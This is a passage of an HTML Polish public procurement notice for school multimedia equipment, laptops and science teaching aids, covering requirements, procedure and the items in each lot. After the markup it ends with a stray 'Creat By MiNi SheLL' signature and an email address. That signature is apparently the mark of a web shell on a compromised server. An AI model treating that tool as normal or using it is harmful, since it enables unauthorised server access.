a)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające, iż system zarządzania jakością Wykonawcy spełnia wymagania zawarte w normie serii PN-EN ISO 9001, lub inne równoważne zaświadczenie wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego lub inne dokumenty potwierdzające stosowanie przez Wykonawcę równoważnych środków zapewnienia jakości,
b)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub inne równoważne zaświadczenie wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego lub inne dokumenty potwierdzające stosowanie przez Wykonawcę równoważnych środków zapewnienia jakości,
c)	certyfikat dostawcy systemu operacyjnego, lub wydruk ze strony dostawcy systemu operacyjnego, potwierdzający poprawną współpracę oferowanej platformy sprzętowej z systemem operacyjnym oferowanym przez wykonawcę
d)	certyfikat lub wydruk ze strony Energy Star potwierdzający zgodność oferowanej platformy sprzętowej komputera z normą Energy Star 5.0
e)	deklaracja zgodności CE
f)	oświadczenie producenta sprzętu (lub jego przedstawiciela w Polsce) potwierdzające, że serwis będzie realizowany przez Producenta lub Autoryzowanego Partnera Serwisowego producenta 
g)	potwierdzenie (wydruk ze strony Passmark - CPU Mark), że zaoferowany komputer laptop wyposażony jest w procesor uzyskujący wynik co najmniej 2700 punktów w teście Passmark - CPU Mark według wyników procesorów publikowanych na stronie http://www.cpubenchmark.net/cpu_list.php. 
4) dla urządzenia wielofunkcyjnego z poz. 4
a) deklaracja zgodności CE
b)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające, iż system zarządzania jakością Wykonawcy spełnia wymagania zawarte w normie serii PN-EN ISO 9001, lub inne równoważne zaświadczenie wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego lub inne dokumenty potwierdzające stosowanie przez Wykonawcę równoważnych środków zapewnienia jakości,
c)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, potwierdzające spełnienie wymagań systemów zarządzania ochroną środowiska, w szczególności certyfikat zgodności z normą PN-EN ISO 14001:2005 lub inne równoważne zaświadczenie wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego lub inne dokumenty potwierdzające stosowanie przez Wykonawcę równoważnych środków zapewnienia jakości.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy pzp, wykonawca zobowiązany będzie do przekazania zamawiającemu oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>osobne dla każdej części</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zmiany Umowy dla swej ważności wymagają formy pisemnej pod rygorem nieważności, jeżeli w Umowie wyraźnie nie przewidziano inaczej.
2. Istotne zmiany Umowy, mogą dotyczyć wyłącznie:
1)warunków płatności,
2) poszczególnych elementów dostawy.
3. Zmiany, o których mowa w ust. 2 niniejszego paragrafu mogą być dokonane w przypadku:
1) przeszkód technicznych uniemożliwiających zastosowanie przyjętych w SIWZ lub ofercie rozwiązań, w szczególności wycofania danego urządzenia z produkcji i zastąpienia go modelem nowszym, 
2) wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian do Umowy, przez co rozumie się: akty terroru, wojny wypowiedziane i niewypowiedziane, blokady, powstania, zamieszki, epidemie, osunięcia gruntu, trzęsienia ziemi, powodzie, wybuchy i inne podobne nieprzewidywalne zdarzenia, poza kontrolą którejkolwiek ze Stron i którym żadna ze Stron nie mogła zapobiec, 
3) zmian w zakresie dofinansowania Projektu ze środków zewnętrznych.
4. Termin realizacji może ulec zmianie tylko w przypadku wystąpienia siły wyższej, zdefiniowanej w ust. 3 pkt. 2 
5. Strona wnioskująca o zmianę Umowy, przedkłada drugiej Stronie pisemne pod rygorem nieważności uzasadnienie konieczności wprowadzenia zmian do Umowy.
6. Zmiany mogą być inicjowane przez Zamawiającego lub Wykonawcę, z tym zastrzeżeniem, że żaden z powyższych zapisów nie obliguje Zamawiającego do wprowadzenia jakiejkolwiek zmiany a jedynie wprowadza taką możliwość. 

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 30/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>urządzenia multimedialne, wyposażenie i sprzęt komputerowy <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2.1 część 1  urządzenia multimedialne, wyposażenie i sprzęt komputerowy TIK
1) zestawy interaktywne  10 szt.:
a) tablica interaktywna  10 szt. 
b) projektor  10 szt.
     2) oprogramowanie tematyczne do tablicy interaktywnej:
a)	oprogramowanie do nauki matematyki, klasy 1,2,3 szkoły podstawowej   5 szt.
b)	oprogramowanie do nauki przyrody, dla klasy 46 szkoły podstawowej  5 szt.
c)	oprogramowanie do nauki biologii dla klasy 1,2,3 gimnazjum  5 szt.
d)	oprogramowanie do nauki fizyki dla klasy 1,2,3 gimnazjum  5 szt.
e)	oprogramowanie do nauki chemii dla klasy 1,2,3 gimnazjum  5 szt.
3) komputery przenośne (laptopy) - 10 zestawów, zestaw komputerowy będzie składał się z:
a)	komputera przenośnego, 
b)	systemu operacyjnego,
c)	oprogramowania dodatkowego (w tym oprogramowania do zarządzania pracownią mobilną), 
d)	oprogramowania instalacyjnego pakietu biurowego, 
e)	licencji oprogramowania antywirusowego. 
4) urządzenie wielofunkcyjne  1 szt.
5) wyposażenie cyfrowych pracowni językowych  2 kpl
6) ekran elektryczny  1 szt.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>32322000-6, 30200000-1,
                    38653400-1,
                    48190000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td> cena oferty</td><td>60</td></tr><tr><td>wydajność procesora laptopa</td><td>20</td></tr><tr><td>termin realizacji zamówienia  </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>pomoce dydaktyczne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	mikroskop USB- 2 szt. 
2)		szkielet człowieka (model)  2 szt.
3)	szkielet gołębia  2 szt.
4)	szkielet ryby  2 szt.
5)	szkielet jaszczurki  2 szt. 
6)	szkielet żaby  2 szt. 
7)	szkielet szczura  2 szt.
8)	zestaw do wody  2 szt.  
9)	preparaty mikroskopowe do zoologii  2 szt.
10)	preparaty mikroskopowe	 do botaniki  2 szt.
11)	preparaty biologiczne- anatomia człowieka	2 szt.
12)	teleskop  2 szt. 
13)	mikroskop optyczny  8 szt. 
14)	korpus człowieka - model anatomiczny	2 szt. 
15)	mikroskop terenowy  4 szt. 
16)	rękawice do gorących przedmiotów  30 szt. 
17)	waga elektroniczna  8 szt. 
18)	lupa 7 szt. 
19)	lornetka  2 szt. 
20)	podwójna lupa  60 szt. 
21)	kompas  10 szt. 
22)	probówka szklana  4 szt. 
23)	stojak do probówek  10 szt. 
24)	kolba szklana  40 szt. 
25)	zlewki miarowe (borokrzemian.)  40 szt. 
26)	menzurki - 40 szt. 
27)	palnik alkoholowy - 	10 szt. 
28)	mały szkielet człowieka  2 szt. 
29)	szalka petriego 90 x 15 mm  20 szt. 
30)		szalka petriego 100 x 15 mm  20 szt. 
31)	elektroskop  10 szt. 
32)	pałeczki szklane	10 szt. 
33)	pałeczki ebonitowe	10 szt. 
34)		termometr elektroniczny z ruchomą głowicą 	10 szt. 
35)		cylindry miarowe (borokrzemian.) 100 ml	30 szt. 
36)	cylindry miarowe (borokrzemian.), 50 ml	30 szt. 
37)	zestaw przyrządów do samodzielnego wykonania preparatu -zestaw 7 szt	60 zest.
38)	akwarium 40x100x50 cm  2 szt. 
39)	szkiełka podstawowe zestaw 50 szt.	20 zest. 
40)	szkiełka zegarkowe  komplet po 3 sztuki	20 kompletów. 
41)	pęsetki duże	60 szt. 
42)	pudełko na 50 szkiełek 	20 szt. 
43)	deszczomierz	8 szt. 
44)	mobilna stacja pogodowa	 - 2 szt. 
45)	wiatromierz	2 szt.
46)	skały osadowe. kolekcja	 - 2 szt. 
47)	minerały. kolekcja	2 szt. 
48)	podstawowe obwody elektryczne zestaw	 - 10 szt. s
49)	stoper	30 szt. 
50)	komora próżniowa - zestaw do eksperymentów  20 szt. 
51)	kwasomierz	30 szt. 
52)	Polska. Ochrona przyrody/mapa do ćwiczeń	2 szt.
53)	globus fizyczny, śr. 220 mm, wys. 30 cm	20 szt. 
54)	globus fizyczny, śr. 42 cm, wys. 62 cm	2 szt. 
55)	globus 250- konturowy z objaśnieniem	20 szt. 
56)	Tarcza Newtona	10 szt. 
57)	mapa fizyczna. Europa 100 x 140 cm	2 szt. 
58)	Niebezpieczne zwierzęta i rośliny w Polsce. Plansza	2 szt.
59)	Grzyby trujące i niejadalne - plansza, wym. 90 x 120 cm	 - 2 szt. 
60)	Pustynia Sahara. Plansza	- 2 szt. 
61)	Sawanna afrykańska. Plansza	2 szt. 
62)	Dżungla afrykańska. Plansza	2 szt. 
63)	Dżungla amazońska. Plansza	2 szt. 
64)	Ameryka Północna. Plansza	2 szt. 
65)	Arktyka. Plansza	2 szt. 
66)	Azja Południowo-Wschodnia. Plansza	2 szt. 
67)	Azja Środkowa. Plansza  2 szt. 
68)	Australia. Plansza	2 szt. 
69)	Rafa koralowa. Plansza	 - 2 szt. 
70)	Porosty - budowa i skala porostowa. Plansza	2 szt. 
71)	Narządy zmysłów. Plansza	2 szt. 
72)	plansza budowa kwiatu	- 2szt.
73)	plansza budowy dziobów - 	2 szt. 
74)	profil glebowy plansza	 - 2 szt. 
75)	plansza etapy rozwoju  człowieka	 - 2 szt. 
76)	Chmury i ich rodzaje. Plansza	2 szt. 
77)	Obieg wody w przyrodzie, plansza	 - 2 szt. 
78)	fartuchy	30 szt. 
79)	okulary ochronne	30 szt. 
80)	rękawice diagnostyczne winylowe bezpudrowe 100 sztuk 	10 opakowań
81)	model skóry	2 szt. 
82)	serce. model demonstracyjny	2 szt. 
83)	ciśnieniomierz zegarowy ze stetoskopem	2 szt. 
84)	miara zwijana 30 m	30 szt. 
85)	Generator van de Graffa  1 szt. 
86)	waga elektroniczna- 5 szt. 
87)	czajnik elektryczny  1 szt. 
88)	poziomica laserowa	4 szt. 
89)	suwmiarka demonstracyjna	4 szt. 
90)	palnik gazowy	2 szt. 
91)	miara zwijana 30 m	4 szt.
92)	tęczowa sprężynka	10 szt. 
93)	zestaw badacza magnetycznych atrakcji	10 szt. 
94)	waga sprężynowa. skala: 250 g - 2,5 n	4 	4 szt. 
95)	waga sprężynowa. skala: 500 g - 5 n	4 szt. 
96)	waga sprężynowa. skala:  1000 g - 10n	4 szt. 
97)	waga sprężynowa. skala: 2000 g - 20 n	4 szt. 
98)	waga sprężynowa. skala: 5000 g - 50 n	4 szt.
99)	zasilacz prądu stałego - 	1 szt. 
100)	miernik uniwersalny z osobnym gniazdem	2 szt. 
101)	izolowane przewody	4 szt. 
102)	opornik drutowy w obudowie	4 szt. 
103)	żarówka z oprawką	10 szt. 
104)	waga sprężynowa. skala: 250 g - 2,5 n	4 szt. 
105)	waga sprężynowa. skala: 500 g - 5 n	- 4 szt. 
106)	waga sprężynowa. skala:  1000 g - 10n  4 szt. 
107)	waga sprężynowa. skala: 2000 g - 20 n	 - 4 szt. 
108)	waga sprężynowa. skala: 5000 g - 50 n	- 4 szt. 
109)	zestaw odważników	- 4 szt. 
110)	soczewka skupiająca	4 szt. 
111)	soczewka rozpraszająca	4 szt. 
112)	pryzmat	2 szt. 
113)	rurka do demonstracji	4 szt. 
114)	Zestaw z magnesami	4 szt. 
115)	statyw 	4 szt. 
116)	gra bingo angielskie	2 szt. 
117)	gra bingo zwierzęta 2 szt. 
118)	gra bingo artykuły spożywcze 	1 szt. 
119)	kostki do konwersacji, nauka j. angielskiego	2 szt. 
120)	edukacyjne kostki obrazkowe	2 szt. 
121)	edukacyjne kostki -  opowiadanie, pisanie	2 szt.
122)	słownictwo podstawowe j. angielski, karty edukacyjne	2 szt. 
123)	domino edukacyjne  j. angielski 2 szt. 
124)	karty edukacyjne, nauka j. angielskiego 2 szt. 
125)	j. angielski dla dzieci - karty obrazkowe	2 szt. 
126)	waga elektroniczna	10 szt. 
127)	zestaw odczynników i chemikaliów dla gimnazjów	5 szt. 
128)	mikroskop 	10 szt. 
129)	zegar szachowy	8 szt. 
130)	mały szkielet człowieka	2 szt. 
131)	walizka do obserwacji oraz badania wód i ph gleb	3 szt. 
132)	szachy szkolne drewniane	2 szt. 
133)	mapa fizyczna. Świat	1 szt. 
134)	mapa fizyczna. Europa	1 szt. 
135)	mapa ogólno geograficzna/ Podział administracyjny. Polska	2 szt. 
136)	mapa Krajobrazy i strefy klimatyczne. Świat  - 	1 szt. 
137)	edukacyjny program multimedialny do terapii logopedycznej -	5 szt.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39162100-6, 38000000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com